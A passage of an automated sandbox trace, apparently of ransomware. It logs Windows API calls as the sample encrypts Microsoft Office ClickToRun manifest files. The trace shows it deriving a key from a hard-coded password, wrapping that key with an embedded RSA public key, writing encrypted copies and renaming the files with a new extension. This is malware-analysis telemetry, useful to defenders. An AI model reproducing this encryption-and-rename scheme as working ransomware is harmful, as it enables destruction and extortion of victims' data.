KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.300] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.300] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28abbf0) returned 1 [0239.300] CryptImportPublicKeyInfo (in: hCryptProv=0x28abbf0, dwCertEncodingType=0x1, pInfo=0x28983b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28983e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28983e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28942f0) returned 1 [0239.300] CryptEncrypt (in: hKey=0x28942f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.301] CryptEncrypt (in: hKey=0x28942f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28ac2d8*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28ac2d8*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.301] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28ac2d8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.301] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.301] CryptEncrypt (in: hKey=0x2893b70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.301] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.301] CloseHandle (hObject=0xffffffff) returned 1 [0239.301] CloseHandle (hObject=0xffffffff) returned 1 [0239.301] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmmui.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmmui.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0239.302] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0239.302] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmmui.msi.16.en-us.xml.gsg")) returned 0 [0239.302] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmmui.msi.16.en-us.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmmui.msi.16.en-us.xml.fuck")) returned 0 [0239.303] CryptDestroyHash (hHash=0x2893fb0) returned 1 [0239.303] CryptDestroyKey (hKey=0x2893b70) returned 1 [0239.303] CryptReleaseContext (hProv=0x28ac140, dwFlags=0x0) returned 1 [0239.303] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.303] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.303] GetLastError () returned 0x5 [0239.303] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmux.osmux.x-none.msi.16.x-none.xml")) returned 0x20 [0239.304] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", dwFileAttributes=0x80) returned 0 [0239.304] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmux.osmux.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.305] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmux.osmux.x-none.msi.16.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.305] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.305] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28ab150) returned 1 [0239.308] CryptCreateHash (in: hProv=0x28ab150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.308] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.308] CryptHashData (hHash=0x2893fb0, pbData=0x2857538, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.308] CryptDeriveKey (in: hProv=0x28ab150, Algid=0x6610, hBaseData=0x2893fb0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2893af0) returned 1 [0239.309] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.309] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.309] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28ab370) returned 1 [0239.309] CryptImportPublicKeyInfo (in: hCryptProv=0x28ab370, dwCertEncodingType=0x1, pInfo=0x2898bd0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2898c00*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2898c08*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2894930) returned 1 [0239.309] CryptEncrypt (in: hKey=0x2894930, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.309] CryptEncrypt (in: hKey=0x2894930, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28ab480*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28ab480*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.310] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28ab480, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.310] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.310] CryptEncrypt (in: hKey=0x2893af0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.310] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.310] CloseHandle (hObject=0xffffffff) returned 1 [0239.310] CloseHandle (hObject=0xffffffff) returned 1 [0239.310] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmux.osmux.x-none.msi.16.x-none.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmux.osmux.x-none.msi.16.x-none.xml"), bFailIfExists=0) returned 0 [0239.310] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", dwFileAttributes=0x0) returned 0 [0239.311] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmux.osmux.x-none.msi.16.x-none.xml.gsg")) returned 0 [0239.311] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmux.osmux.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmux.osmux.x-none.msi.16.x-none.xml.fuck")) returned 0 [0239.312] CryptDestroyHash (hHash=0x2893fb0) returned 1 [0239.312] CryptDestroyKey (hKey=0x2893af0) returned 1 [0239.312] CryptReleaseContext (hProv=0x28ab150, dwFlags=0x0) returned 1 [0239.312] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.312] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.312] GetLastError () returned 0x5 [0239.312] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmuxmui.msi.16.en-us.xml")) returned 0x20 [0239.312] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0239.313] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmuxmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.313] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmuxmui.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.314] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.314] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28ab838) returned 1 [0239.317] CryptCreateHash (in: hProv=0x28ab838, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.317] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.317] CryptHashData (hHash=0x2893af0, pbData=0x2856e30, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.317] CryptDeriveKey (in: hProv=0x28ab838, Algid=0x6610, hBaseData=0x2893af0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2893b70) returned 1 [0239.317] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.317] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.317] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28ac360) returned 1 [0239.318] CryptImportPublicKeyInfo (in: hCryptProv=0x28ac360, dwCertEncodingType=0x1, pInfo=0x2898620*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2898650*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2898658*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2894370) returned 1 [0239.318] CryptEncrypt (in: hKey=0x2894370, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.318] CryptEncrypt (in: hKey=0x2894370, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28ab3f8*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28ab3f8*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.318] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28ab3f8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.318] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.318] CryptEncrypt (in: hKey=0x2893b70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.318] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.319] CloseHandle (hObject=0xffffffff) returned 1 [0239.319] CloseHandle (hObject=0xffffffff) returned 1 [0239.319] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmuxmui.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmuxmui.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0239.319] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0239.320] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmuxmui.msi.16.en-us.xml.gsg")) returned 0 [0239.320] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmuxmui.msi.16.en-us.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmuxmui.msi.16.en-us.xml.fuck")) returned 0 [0239.321] CryptDestroyHash (hHash=0x2893af0) returned 1 [0239.321] CryptDestroyKey (hKey=0x2893b70) returned 1 [0239.321] CryptReleaseContext (hProv=0x28ab838, dwFlags=0x0) returned 1 [0239.321] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.321] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.321] GetLastError () returned 0x5 [0239.321] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlook.outlook.x-none.msi.16.x-none.xml")) returned 0x20 [0239.321] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", dwFileAttributes=0x80) returned 0 [0239.322] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlook.outlook.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.322] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlook.outlook.x-none.msi.16.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.323] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.324] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28ab150) returned 1 [0239.326] CryptCreateHash (in: hProv=0x28ab150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.326] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.327] CryptHashData (hHash=0x2893af0, pbData=0x28573d0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.327] CryptDeriveKey (in: hProv=0x28ab150, Algid=0x6610, hBaseData=0x2893af0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2893b70) returned 1 [0239.327] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.327] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.327] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28ac140) returned 1 [0239.327] CryptImportPublicKeyInfo (in: hCryptProv=0x28ac140, dwCertEncodingType=0x1, pInfo=0x28976b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28976e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28976e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28949b0) returned 1 [0239.327] CryptEncrypt (in: hKey=0x28949b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.327] CryptEncrypt (in: hKey=0x28949b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28abfa8*, 